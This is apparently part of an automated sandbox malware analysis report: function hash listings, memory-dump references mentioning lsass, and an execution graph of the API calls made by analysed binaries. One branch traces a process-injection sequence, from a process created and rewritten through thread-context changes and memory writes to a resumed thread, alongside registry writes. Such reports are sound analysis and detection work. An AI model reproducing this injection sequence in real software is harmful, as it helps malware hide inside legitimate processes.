                                                                                                              • Opcode ID: 3616bccf63ab0673b6ddcbb85814c80a8ea7b221e16f54645427d343d5099b20
                                                                                                              • Instruction ID: 6d85740570a1b0861e119ef1c74d938457b903bb4ea606f68700e576a9e15717
                                                                                                              • Opcode Fuzzy Hash: 3616bccf63ab0673b6ddcbb85814c80a8ea7b221e16f54645427d343d5099b20
                                                                                                              • Instruction Fuzzy Hash: C9113836208BC086D761CB06B44029AB7A6FBCDB94F64412AEFCD87B29CF38C4519B40
                                                                                                              Function 00000140ADFC62C8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.3348718884.00000140ADFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140ADFC0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_140adfc0000_lsass.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CountCriticalInitializeSectionSpintry_get_function
                                                                                                              • String ID: InitializeCriticalSectionEx
                                                                                                              • API String ID: 539475747-3084827643
                                                                                                              • Opcode ID: 7ab7e1f7720f2558b91f0bfd0b36e97e7c4448d79672db0312535455e5b378ac
                                                                                                              • Instruction ID: 02179cc578c218ad208edff0fe8ba511794c2c37b157d05e22a9bac0752ce5c1
                                                                                                              • Opcode Fuzzy Hash: 7ab7e1f7720f2558b91f0bfd0b36e97e7c4448d79672db0312535455e5b378ac
                                                                                                              • Instruction Fuzzy Hash: 5EF03A3161578493FA169B43A4402DA7263BF8CB88FA88026AF9917B75CE39C496A741
                                                                                                              Function 00000140ADFC2958 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.3348718884.00000140ADFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140ADFC0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_140adfc0000_lsass.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Valuetry_get_function
                                                                                                              • String ID: FlsSetValue
                                                                                                              • API String ID: 738293619-3750699315
                                                                                                              • Opcode ID: 4f7bd1d21e3783e6278deb9379984bbb26a0530b157d76af6cf8199b30a7d814
                                                                                                              • Instruction ID: 2e828d9efaabab77e900a40bcf59446c74e1cd2f8fee8cde6f8e377ca678c6dc
                                                                                                              • Opcode Fuzzy Hash: 4f7bd1d21e3783e6278deb9379984bbb26a0530b157d76af6cf8199b30a7d814
                                                                                                              • Instruction Fuzzy Hash: 15E0397521078493EA575B52A4002DE7323FF8C788FA890269B99076B8CE38C897E290
                                                                                                              Function 00000140ADFC6408 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.3348718884.00000140ADFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140ADFC0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_140adfc0000_lsass.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: DownlevelLocaleName__crttry_get_function
                                                                                                              • String ID: LocaleNameToLCID
                                                                                                              • API String ID: 404522899-2050040251
                                                                                                              • Opcode ID: 7eb4b64a6bb929c538f746eb82f6ea186045184b5677d91810cc171b55c20c29
                                                                                                              • Instruction ID: 200ea365b4004005825e1b883a0cc46f56db300498a89813c9ca0321064b7313
                                                                                                              • Opcode Fuzzy Hash: 7eb4b64a6bb929c538f746eb82f6ea186045184b5677d91810cc171b55c20c29
                                                                                                              • Instruction Fuzzy Hash: CDE0E53532474893FA079B57A4413EB3293AF8C744FB85021AB550B6B5CE38C957A751

                                                                                                              Execution Graph

                                                                                                              Execution Coverage:3.4%
                                                                                                              Dynamic/Decrypted Code Coverage:28.3%
                                                                                                              Signature Coverage:21.8%
                                                                                                              Total number of Nodes:619
                                                                                                              Total number of Limit Nodes:34
                                                                                                              execution_graph 27974 10003c21 27975 10003c2c 27974->27975 27976 10003c5f dllmain_crt_process_detach 27974->27976 27977 10003c51 dllmain_crt_process_attach 27975->27977 27978 10003c31 27975->27978 27983 10003c3b 27976->27983 27977->27983 27979 10003c36 27978->27979 27980 10003c47 27978->27980 27979->27983 27984 10004236 27 API calls 27979->27984 27985 10004217 31 API calls 27980->27985 27984->27983 27985->27983 27986 c25743 28032 c26684 27986->28032 27988 c2574f GetStartupInfoW 27990 c25772 27988->27990 28033 c28e0c HeapCreate 27990->28033 27992 c257c2 28180 c2777c 78 API calls 7 library calls 27992->28180 27995 c257c8 27996 c257d4 __RTC_Initialize 27995->27996 27997 c257cc 27995->27997 28035 c2a6d8 72 API calls 3 library calls 27996->28035 28181 c2571a 67 API calls 3 library calls 27997->28181 27999 c257d3 27999->27996 28001 c257e1 28002 c257e5 28001->28002 28003 c257ed GetCommandLineW 28001->28003 28182 c29adf 67 API calls 3 library calls 28002->28182 28036 c2a67b 69 API calls 2 library calls 28003->28036 28006 c257ec 28006->28003 28007 c257fc 28183 c2a5cd 68 API calls 2 library calls 28007->28183 28009 c25806 28010 c25812 28009->28010 28011 c2580a 28009->28011 28037 c2a39e 67 API calls 5 library calls 28010->28037 28184 c29adf 67 API calls 3 library calls 28011->28184 28014 c25811 28014->28010 28015 c25817 28016 c25823 28015->28016 28017 c2581b 28015->28017 28038 c29b9e 74 API calls 5 library calls 28016->28038 28185 c29adf 67 API calls 3 library calls 28017->28185 28020 c25822 28020->28016 28021 c25829 28022 c2582e 28021->28022 28025 c25835 __wwincmdln 28021->28025 28186 c29adf 67 API calls 3 library calls 28022->28186 28024 c25834 28024->28025 28025->28024 28039 c21ce0 28025->28039 28028 c25863 28188 c29d7b 67 API calls _doexit 28028->28188 28031 c25868 __calloc_impl 28032->27988 28034 c257b6 28033->28034 28034->27992 28179 c2571a 67 API calls 3 library calls 28034->28179 28035->28001 28036->28007 28037->28015 28038->28021 28189 c25670 28039->28189 28043 c21f10 ?WaitDllInitThread@ ?DllGetSettingBool@@YA_NPB_W 28044 c21f28 ?DllLogToFile@ 28043->28044 28045 c21f3c ?DllGetSettingInt@@YAHPB_W 28043->28045 28046 c22214 28044->28046 28047 c21f55 28045->28047 28048 c21f4e Sleep 28045->28048 28212 c24f90 5 API calls __invoke_watson 28046->28212 28053 c2221b 28047->28053 28054 c21f6b ?WaitDllInitThread@ 28047->28054 28048->28047 28049 c21d70 28049->28047 28056 c21d86 ?WaitDllInitThread@ 28049->28056 28050 c21d2c 28050->28043 28050->28049 28052 c22af4 28052->28028 28187 c29d4f 67 API calls _doexit 28052->28187 28060 c22235 ?WaitDllInitThread@ CoInitialize 28053->28060 28061 c222ba 28053->28061 28196 c21290 RegOpenKeyExW RegCloseKey 28054->28196 28194 c21290 RegOpenKeyExW RegCloseKey 28056->28194 28057 c21f93 28062 c220d7 28057->28062 28063 c21f9f RegSetValueExW 28057->28063 28059 c21dae 28064 c21ea9 ?DllGetSettingBool@@YA_NPB_W 28059->28064 28195 c212f0 RegQueryValueExW 28059->28195 28201 c242a0 _memcpy_s _wcschr 28060->28201 28078 c223a2 GetModuleFileNameW PathFindFileNameW SetCurrentDirectoryW 28061->28078 28079 c222d2 ?WaitDllInitThread@ 28061->28079 28065 c220f6 ?DllLoadStringEx@@YA?AV?$CStringT@_WV?$StrTraitATL@_WV?$ChTraitsCRT@_W@ATL@@@ATL@@@ATL@@H 28062->28065 28197 c256a0 __VEC_memzero 28063->28197 28071 c21ee6 ?DllGetSettingInt@@YAHPB_W 28064->28071 28072 c21ebb ?DllLogToFile@ 28064->28072 28200 c24360 101 API calls __strftime_l 28065->28200 28068 c21ff0 DoEnvironmentSubstW 28198 c256a0 __VEC_memzero 28068->28198 28075 c21ef8 Sleep 28071->28075 28076 c21eff 28071->28076 28072->28046 28081 c21eda RegCloseKey 28072->28081 28073 c2225a ?DllExecuteNamedCommand@@YA_NPB_W 28082 c222af CoUninitialize 28073->28082 28083 c2226f PeekMessageW 28073->28083 28075->28076 28076->28047 28086 c21f07 RegCloseKey 28076->28086 28077 c21dc9 28077->28064 28092 c21ddb ?DllLoadStringEx@@YA?AV?$CStringT@_WV?$StrTraitATL@_WV?$ChTraitsCRT@_W@ATL@@@ATL@@@ATL@@H ?DllLoadStringEx@@YA?AV?$CStringT@_WV?$StrTraitATL@_WV?$ChTraitsCRT@_W@ATL@@@ATL@@@ATL@@H MessageBoxW 28077->28092 28089 c223e2 28078->28089 28087 c222f0 28079->28087 28080 c22121 FormatMessageW ?DllLoadStringEx@@YA?AV?$CStringT@_WV?$StrTraitATL@_WV?$ChTraitsCRT@_W@ATL@@@ATL@@@ATL@@H MessageBoxW 28093 c221e5 28080->28093 28081->28046 28082->28046 28083->28082 28084 c22285 28083->28084 28090 c22291 TranslateMessage DispatchMessageW PeekMessageW 28084->28090 28085 c22031 DoEnvironmentSubstW 28199 c256a0 __VEC_memzero 28085->28199 28086->28047 28097 c222ff GetCurrentDirectoryW PathAppendW PathAddExtensionW LoadLibraryExW 28087->28097 28098 c2234c ?DllLoadTranslationResources@@YAXPAUHINSTANCE__@@PAH ?DllSaveAdmx@@YA_NW4TSettingsComponent@@PBD11 28087->28098 28094 c224bb ?WaitDllInitThread@ 28089->28094 28095 c223ef CoInitialize SHEvaluateSystemCommandTemplate 28089->28095 28090->28082 28090->28090 28107 c21e0f _memset 28092->28107 28093->28046 28102 c2220d RegCloseKey 28093->28102 28114 c224cf 28094->28114 28099 c22437 28095->28099 28110 c22417 _memset 28095->28110 28096 c2205f CreateProcessW 28100 c220e1 GetLastError 28096->28100 28101 c220a4 CloseHandle WaitForSingleObject GetExitCodeProcess CloseHandle 28096->28101 28097->28098 28098->28046 28103 c2237e ?DllSaveAdmx@@YA_NW4TSettingsComponent@@PBD11 28098->28103 28202 c22be0 7 API calls 3 library calls 28099->28202 28105 c220eb 28100->28105 28101->28105 28102->28046 28103->28046 28105->28065 28106 c22196 ?DllLoadStringEx@@YA?AV?$CStringT@_WV?$StrTraitATL@_WV?$ChTraitsCRT@_W@ATL@@@ATL@@@ATL@@H ?DllLoadStringEx@@YA?AV?$CStringT@_WV?$StrTraitATL@_WV?$ChTraitsCRT@_W@ATL@@@ATL@@@ATL@@H MessageBoxW 28105->28106 28108 c221d7 28106->28108 28109 c21e3f DoEnvironmentSubstW GetFileAttributesW 28107->28109 28108->28093 28109->28064 28111 c21e68 GetModuleFileNameW CoInitialize ShellExecuteW CoUninitialize 28109->28111 28113 c2249e CoUninitialize 28110->28113 28111->28064 28112 c225ad 28117 c225c4 28112->28117 28125 c2260e 28112->28125 28203 c213d0 CoTaskMemFree 28113->28203 28114->28112 28116 c22582 CoInitialize ?DllImportSettingsXml@@YA_NPB_W CoUninitialize 28114->28116 28116->28046 28116->28112 28120 c225df CoInitialize ?DllExportSettingsXml@@YA_NPB_W CoUninitialize 28117->28120 28118 c224ad 28204 c213d0 CoTaskMemFree 28118->28204 28120->28046 28121 c22661 SetUnhandledExceptionFilter 28122 c2266e GetUserNameW GetCurrentThreadId GetThreadDesktop GetUserObjectInformationW 28121->28122 28205 c25598 67 API calls 4 library calls 28122->28205 28124 c226be GetUserObjectInformationW 28206 c24efd 79 API calls 2 library calls 28124->28206 28125->28121 28125->28122 28127 c226de 28207 c24360 101 API calls __strftime_l 28127->28207 28129 c22705 28208 c254bb 67 API calls 7 library calls 28129->28208 28131 c2270b 28132 c22713 ?DllLogToFile@ 28131->28132 28133 c2272e FindWindowExW 28131->28133 28132->28133 28134 c22753 28133->28134 28135 c22747 GetWindowThreadProcessId 28133->28135 28136 c22763 CreateMutexW GetLastError 28134->28136 28137 c22885 28134->28137 28135->28134 28140 c22793 28136->28140 28141 c22788 GetLastError 28136->28141 28138 c2288e GetDesktopWindow FindWindowExW RegisterWindowMessageW PostMessageW 28137->28138 28139 c228bd 28137->28139 28138->28046 28143 c228e5 OleInitialize 28139->28143 28154 c228d1 28139->28154 28142 c227cf 28140->28142 28144 c2279c 28140->28144 28141->28137 28141->28140 28145 c22833 28142->28145 28146 c227d3 AllowSetForegroundWindow ?FindTaskBar@@YAPAUHWND__@@K 28142->28146 28147 c22906 28143->28147 28148 c228f5 ?DllUpdateSettings@ ?InitManagers@@YAX_N 28143->28148 28144->28145 28149 c227a5 AllowSetForegroundWindow FindWindowW 28144->28149 28152 c22864 28145->28152 28153 c22838 28145->28153 28150 c227f2 RegisterWindowMessageW 28146->28150 28151 c227c4 28146->28151 28209 c21c50 137 API calls 28147->28209 28148->28147 28149->28145 28149->28151 28155 c2282d PostMessageW 28150->28155 28151->28155 28152->28046 28157 c2286d ?DllLogToFile@ 28152->28157 28153->28046 28156 c22844 WaitForSingleObject 28153->28156 28154->28046 28158 c228d9 ReleaseMutex 28154->28158 28155->28145 28156->28046 28159 c22858 ReleaseMutex 28156->28159 28157->28046 28158->28046 28159->28046 28161 c22942 RegisterWindowMessageW GetModuleHandleW GetProcAddress 28162 c229af ChangeWindowMessageFilter ChangeWindowMessageFilter ChangeWindowMessageFilter ChangeWindowMessageFilter 28161->28162 28163 c2296f 28161->28163 28162->28163 28210 c21000 103 API calls 2 library calls 28163->28210 28165 c229fb 28166 c22a90 ?DllLogToFile@ DestroyWindow 28165->28166 28169 c22a21 ?DllLogToFile@ 28165->28169 28170 c22a0e PostMessageW 28165->28170 28167 c22ab2 ?CloseManagers@@YAX_N 28166->28167 28168 c22abd OleUninitialize 28166->28168 28167->28168 28172 c22ad2 28168->28172 28173 c22acb ReleaseMutex 28168->28173 28171 c22a50 28169->28171 28170->28169 28174 c22a57 IsWindow 28171->28174 28175 c22a5e GetMessageW 28171->28175 28172->28046 28211 c2478c GetProcessHeap HeapFree 28172->28211 28173->28172 28174->28175 28176 c22a8c 28174->28176 28175->28176 28177 c22a76 TranslateMessage DispatchMessageW 28175->28177 28176->28166 28177->28171 28179->27992 28180->27995 28181->27999 28182->28006 28183->28009 28184->28014 28185->28020 28186->28024 28187->28028 28188->28031 28190 c21cea ?DllLogToFile@ GetModuleHandleW 28189->28190 28191 c22b50 FindResourceW 28190->28191 28192 c22b68 LoadResource LockResource 28191->28192 28193 c22b64 28191->28193 28192->28193 28193->28050 28194->28059 28195->28077 28196->28057 28197->28068 28198->28085 28199->28096 28200->28080 28201->28073 28202->28110 28203->28118 28204->28046 28205->28124 28206->28127 28207->28129 28208->28131 28209->28161 28210->28165 28211->28046 28212->28052 28213 6e09b8c8 28222 6e0a8c17 28213->28222 28218 6e0a97f9 81 API calls 28219 6e09b8e0 28218->28219 28235 6e09cc60 52 API calls ___scrt_initialize_default_local_stdio_options 28219->28235 28221 6e09b8fa 28225 6e0a932b __ExceptionPtr::__ExceptionPtr 28222->28225 28223 6e09b8cf 28228 6e0a97f9 28223->28228 28225->28223 28236 6e0b0b6f 7 API calls 2 library calls 28225->28236 28237 6e0a95dc RaiseException __CxxThrowException@8 new 28225->28237 28238 6e0a95bf RaiseException __CxxThrowException@8 __ExceptionPtr::__ExceptionPtr 28225->28238 28239 6e0b0da4 28228->28239 28230 6e0a9806 28231 6e09b8d9 28230->28231 28232 6e0a9812 28230->28232 28231->28218 28253 6e0a9cef 27 API calls 2 library calls 28232->28253 28235->28221 28236->28225 28237->28225 28240 6e0b0db0 28239->28240 28241 6e0b0dc5 28239->28241 28263 6e0b1251 20 API calls _abort 28240->28263 28254 6e0b31be 28241->28254 28244 6e0b0db5 28264 6e0b1195 26 API calls ___std_exception_copy 28244->28264 28247 6e0b0de8 28247->28230 28248 6e0b0dc0 28248->28230 28250 6e0b0dd9 28266 6e0b1251 20 API calls _abort 28250->28266 28252 6e0b0de4 28252->28230 28267 6e0b2e03 28254->28267 28257 6e0b320f 28274 6e0b0c15 28257->28274 28258 6e0b31ee 28295 6e0a8161 28258->28295 28262 6e0b0dd0 28262->28247 28265 6e0b1251 20 API calls _abort 28262->28265 28263->28244 28264->28248 28265->28250 28266->28252 28268 6e0b2e33 28267->28268 28271 6e0b2e2f 28267->28271 28268->28257 28268->28258 28269 6e0b2e53 28269->28268 28272 6e0b2e5f GetProcAddress 28269->28272 28271->28268 28271->28269 28302 6e0b2e9f LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary 28271->28302 28273 6e0b2e6f __crt_fast_encode_pointer 28272->28273 28273->28268 28303 6e0b3da5 28274->28303 28277 6e0b0c25 28279 6e0b0c2f IsProcessorFeaturePresent 28277->28279 28280 6e0b0c4d 28277->28280 28281 6e0b0c3a 28279->28281 28306 6e0b0384 28280->28306 28317 6e0b0fcb 8 API calls 3 library calls 28281->28317 28296 6e0a816a 28295->28296 28297 6e0a816c IsProcessorFeaturePresent 28295->28297 28296->28262 28299 6e0a8c61 28297->28299 28370 6e0a8c25 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 28299->28370 28301 6e0a8d44 28301->28262 28302->28271 28321 6e0b3d13 28303->28321 28335 6e0b015e 28306->28335 28316 6e0b3e00 39 API calls 3 library calls 28316->28277 28317->28280 28324 6e0b3cb9 28321->28324 28323 6e0b0c1a 28323->28277 28323->28316 28325 6e0b3cc5 ___DestructExceptionObject 28324->28325 28330 6e0b0ec4 EnterCriticalSection 28325->28330 28327 6e0b3cd3 28331 6e0b3d07 28327->28331 28329 6e0b3cfa ___DestructExceptionObject 28329->28323 28330->28327 28334 6e0b0f0c LeaveCriticalSection 28331->28334 28333 6e0b3d11 28333->28329 28334->28333 28336 6e0b016a _abort 28335->28336 28337 6e0b0183 28336->28337 28338 6e0b0171 28336->28338 28361 6e0b0ec4 EnterCriticalSection 28337->28361 28359 6e0b02b8 GetModuleHandleW 28338->28359 28341 6e0b0176 28341->28337 28360 6e0b02fc 8 API calls TranslatorGuardHandler 28341->28360 28342 6e0b0228 28365 6e0b0268 LeaveCriticalSection _abort 28342->28365 28345 6e0b01ff 28351 6e0b0217 28345->28351 28363 6e0aff17 5 API calls TranslatorGuardHandler 28345->28363 28346 6e0b0182 28346->28337 28347 6e0b0241 28349 6e0b0271 28347->28349 28350 6e0b0245 28347->28350 28348 6e0b018a 28348->28342 28348->28345 28362 6e0b0933 20 API calls _abort 28348->28362 28367 6e0b93b9 5 API calls TranslatorGuardHandler 28349->28367 28366 6e0b0277 17 API calls _abort 28350->28366 28364 6e0aff17 5 API calls TranslatorGuardHandler 28351->28364 28359->28341 28360->28346 28361->28348 28362->28345 28363->28351 28364->28342 28365->28347 28370->28301 28371 6e0a1de0 28374 10003f36 28371->28374 28375 10003f44 28374->28375 28376 10003f3f 28374->28376 28380 10003e03 28375->28380 28397 10004498 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 28376->28397 28379 10003f52 28381 10003e0f ___DestructExceptionObject 28380->28381 28382 10003e25 dllmain_raw 28381->28382 28385 10003e20 28381->28385 28383 10003e3f dllmain_crt_dispatch 28382->28383 28384 10003efa ___DestructExceptionObject 28382->28384 28383->28384 28383->28385 28384->28379 28389 10003e61 28385->28389 28419 10005e54 12 API calls 2 library calls 28385->28419 28398 10001270 28389->28398 28390 10003e98 28391 10003eab 28390->28391 28420 10005ef0 12 API calls 2 library calls 28390->28420 28391->28384 28394 10003eb5 dllmain_crt_dispatch 28391->28394 28392 10001270 __DllMainCRTStartup@12 44 API calls 28395 10003e84 dllmain_crt_dispatch dllmain_raw 28392->28395 28394->28384 28396 10003ec8 dllmain_raw 28394->28396 28395->28390 28396->28384 28397->28375 28399 1000128b __DllMainCRTStartup@12 28398->28399 28400 10002bd7 28399->28400 28421 10002c90 28399->28421 28459 10003ae3 28400->28459 28402 10002bf4 28402->28390 28402->28392 28404 10002abf 28404->28400 28436 10002c00 RegOpenKeyExW 28404->28436 28406 10002acc 28443 10002f00 28406->28443 28408 10002af1 28409 10002f00 __DllMainCRTStartup@12 27 API calls 28408->28409 28410 10002b08 28409->28410 28411 10002f00 __DllMainCRTStartup@12 27 API calls 28410->28411 28412 10002b1c 28411->28412 28450 10003660 28412->28450 28414 10002bcc 28458 10002f60 27 API calls __DllMainCRTStartup@12 28414->28458 28416 10002b9c GetFileAttributesW 28417 10002b60 __DllMainCRTStartup@12 28416->28417 28417->28414 28417->28416 28418 10002bc1 SetFileAttributesW 28417->28418 28418->28417 28419->28389 28420->28391 28422 10002c9d __DllMainCRTStartup@12 ___scrt_fastfail 28421->28422 28423 10002cb7 CreateProcessA 28422->28423 28424 10002cf0 28423->28424 28426 10002cff 28423->28426 28425 10003ae3 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 28424->28425 28427 10002cfb 28425->28427 28466 10002dc0 28426->28466 28427->28404 28429 10002d5a 28430 10002d85 ResumeThread CloseHandle CloseHandle 28429->28430 28431 10002d65 CloseHandle CloseHandle 28429->28431 28433 10003ae3 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 28430->28433 28432 10003ae3 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 28431->28432 28434 10002d81 28432->28434 28435 10002dad 28433->28435 28434->28404 28435->28404 28437 10002c3f lstrlenW RegSetValueExW RegCloseKey 28436->28437 28438 10002c2f 28436->28438 28439 10003ae3 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 28437->28439 28440 10003ae3 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 28438->28440 28441 10002c87 28439->28441 28442 10002c3b 28440->28442 28441->28406 28442->28406 28444 10002f21 28443->28444 28445 10002f33 28443->28445 28484 100030d0 27 API calls __DllMainCRTStartup@12 28444->28484 28485 100030d0 27 API calls __DllMainCRTStartup@12 28445->28485 28447 10002f2c 28447->28408 28449 10002f59 28449->28408 28451 100036c4 28450->28451 28452 10003703 28450->28452 28453 100036d6 28451->28453 28486 10003a96 27 API calls 2 library calls 28451->28486 28452->28417 28487 10003780 27 API calls 3 library calls 28453->28487 28456 100036dc 28488 10003840 27 API calls __DllMainCRTStartup@12 28456->28488 28458->28400 28460 10003aec 28459->28460 28461 10003aee IsProcessorFeaturePresent 28459->28461 28460->28402 28463 10003fb9 28461->28463 28489 10003f7c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 28463->28489 28465 1000409c 28465->28402 28482 10006080 28466->28482 28468 10002df5 Wow64GetThreadContext 28469 10002e24 VirtualAllocEx 28468->28469 28470 10002e14 28468->28470 28471 10002e40 WriteProcessMemory 28469->28471 28472 10002e82 28469->28472 28473 10003ae3 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 28470->28473 28475 10002e73 VirtualFreeEx 28471->28475 28476 10002e5b Wow64SetThreadContext 28471->28476 28477 10003ae3 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 28472->28477 28474 10002e20 28473->28474 28474->28429 28475->28472 28476->28475 28478 10002e95 28476->28478 28479 10002e91 28477->28479 28480 10003ae3 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 28478->28480 28479->28429 28481 10002ea7 28480->28481 28481->28429 28483 10006097 28482->28483 28483->28468 28483->28483 28484->28447 28485->28449 28487->28456 28488->28452 28489->28465 28490 6e0a86a7 28491 6e0a86b2 28490->28491 28492 6e0a86e5 dllmain_crt_process_detach 28490->28492 28493 6e0a86d7 dllmain_crt_process_attach 28491->28493 28494 6e0a86b7 28491->28494 28499 6e0a86c1 28492->28499 28493->28499 28495 6e0a86bc 28494->28495 28496 6e0a86cd 28494->28496 28495->28499 28500 6e0a8e06 27 API calls 28495->28500 28501 6e0a8de7 31 API calls 28496->28501 28500->28499 28501->28499 28503 6e0a86fa 28504 6e0a8706 ___DestructExceptionObject 28503->28504 28523 6e0a8e76 28504->28523 28506 6e0a870d 28507 6e0a873a 28506->28507 28508 6e0a8712 ___DestructExceptionObject 28506->28508 28545 6e0a9145 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 28506->28545 28534 6e0a8dd9 28507->28534 28511 6e0a8749 __RTC_Initialize 28511->28508 28537 6e0a9053 28511->28537 28515 6e0a8761 28516 6e0a9053 __scrt_initialize_thread_safe_statics 29 API calls 28515->28516 28517 6e0a876d ___scrt_initialize_default_local_stdio_options 28516->28517 28541 6e0aff73 28517->28541 28521 6e0a878e 28521->28508 28547 6e0aff17 5 API calls TranslatorGuardHandler 28521->28547 28524 6e0a8e7f 28523->28524 28548 6e0a9363 IsProcessorFeaturePresent 28524->28548 28526 6e0a8e8b 28549 6e0ab885 10 API calls 3 library calls 28526->28549 28528 6e0a8e90 28529 6e0a8e94 28528->28529 28550 6e0b0ad6 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 28528->28550 28529->28506 28531 6e0a8e9d 28532 6e0a8eab 28531->28532 28551 6e0ab8c9 8 API calls 4 library calls 28531->28551 28532->28506 28552 6e0a8eaf 28534->28552 28536 6e0a8de0 28536->28511 28558 6e0a9018 28537->28558 28540 6e0a9104 InitializeSListHead 28540->28515 28544 6e0aff8a 28541->28544 28542 6e0a8161 TranslatorGuardHandler 5 API calls 28543 6e0a8783 28542->28543 28543->28508 28546 6e0a8dc1 IsProcessorFeaturePresent ___scrt_release_startup_lock 28543->28546 28544->28542 28545->28507 28546->28521 28547->28508 28548->28526 28549->28528 28550->28531 28551->28529 28553 6e0a8ebd 28552->28553 28556 6e0a8ec2 ___scrt_initialize_onexit_tables ___scrt_release_startup_lock 28552->28556 28553->28556 28557 6e0a9145 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 28553->28557 28555 6e0a8f45 28556->28536 28557->28555 28559 6e0a903c 28558->28559 28560 6e0a9035 28558->28560 28565 6e0b098d 29 API calls __onexit 28559->28565 28564 6e0b091d 29 API calls __onexit 28560->28564 28563 6e0a875c 28563->28540 28564->28563 28565->28563 28566 6e0a6fb9 VirtualFree 28567 10003c74 28568 10003c80 ___DestructExceptionObject 28567->28568 28587 100042a6 28568->28587 28570 10003c87 28571 10003cb4 28570->28571 28572 10003c8c ___DestructExceptionObject 28570->28572 28598 1000457b IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 28570->28598 28599 10004209 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_initialize_onexit_tables 28571->28599 28575 10003cc3 __RTC_Initialize 28575->28572 28600 10004483 29 API calls __onexit 28575->28600 28577 10003cd6 28601 10004534 InitializeSListHead 28577->28601 28579 10003cdb 28602 10004483 29 API calls __onexit 28579->28602 28581 10003ce7 ___scrt_initialize_default_local_stdio_options 28603 10007193 5 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 28581->28603 28583 10003cfd 28583->28572 28604 100041f1 IsProcessorFeaturePresent ___scrt_initialize_onexit_tables 28583->28604 28585 10003d08 28585->28572 28605 10007137 5 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 28585->28605 28588 100042af 28587->28588 28606 100046f4 IsProcessorFeaturePresent 28588->28606 28590 100042bb 28607 10005fab 10 API calls 3 library calls 28590->28607 28592 100042c0 28597 100042c4 28592->28597 28608 10007cc5 28592->28608 28595 100042db 28595->28570 28597->28570 28598->28571 28599->28575 28600->28577 28601->28579 28602->28581 28603->28583 28604->28585 28605->28572 28606->28590 28607->28592 28612 1000949b 28608->28612 28611 10005fef 8 API calls 4 library calls 28611->28597 28615 100094b8 28612->28615 28616 100094b4 28612->28616 28613 10003ae3 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 28614 100042cd 28613->28614 28614->28595 28614->28611 28615->28616 28618 10009400 28615->28618 28616->28613 28619 1000940c ___DestructExceptionObject 28618->28619 28630 10008441 EnterCriticalSection 28619->28630 28621 10009413 28631 1000a6be 28621->28631 28623 10009422 28629 10009431 28623->28629 28644 10009294 29 API calls 28623->28644 28626 1000942c 28645 1000934a GetStdHandle GetFileType 28626->28645 28627 10009442 ___DestructExceptionObject 28627->28615 28646 1000944d LeaveCriticalSection _abort 28629->28646 28630->28621 28632 1000a6ca ___DestructExceptionObject 28631->28632 28633 1000a6d7 28632->28633 28634 1000a6ee 28632->28634 28655 100099da 20 API calls __dosmaperr 28633->28655 28647 10008441 EnterCriticalSection 28634->28647 28637 1000a6dc 28656 10006fe1 26 API calls ___std_exception_copy 28637->28656 28639 1000a6e6 ___DestructExceptionObject 28639->28623 28642 1000a6fa 28643 1000a726 28642->28643 28648 1000a60f 28642->28648 28657 1000a74d LeaveCriticalSection _abort 28643->28657 28644->28626 28645->28629 28646->28627 28647->28642 28658 10007e33 28648->28658 28650 1000a621 28654 1000a62e 28650->28654 28665 10008712 11 API calls 2 library calls 28650->28665 28652 1000a680 28652->28642 28666 10007d68 20 API calls __dosmaperr 28654->28666 28655->28637 28656->28639 28657->28639 28659 10007e40 __dosmaperr 28658->28659 28660 10007e80 28659->28660 28661 10007e6b RtlAllocateHeap 28659->28661 28667 10007055 7 API calls 2 library calls 28659->28667 28668 100099da 20 API calls __dosmaperr 28660->28668 28661->28659 28663 10007e7e 28661->28663 28663->28650 28665->28650 28666->28652 28667->28659 28668->28663 28669 6e0a89bc 28670 6e0a89ca 28669->28670 28671 6e0a89c5 28669->28671 28675 6e0a8889 28670->28675 28692 6e0a9068 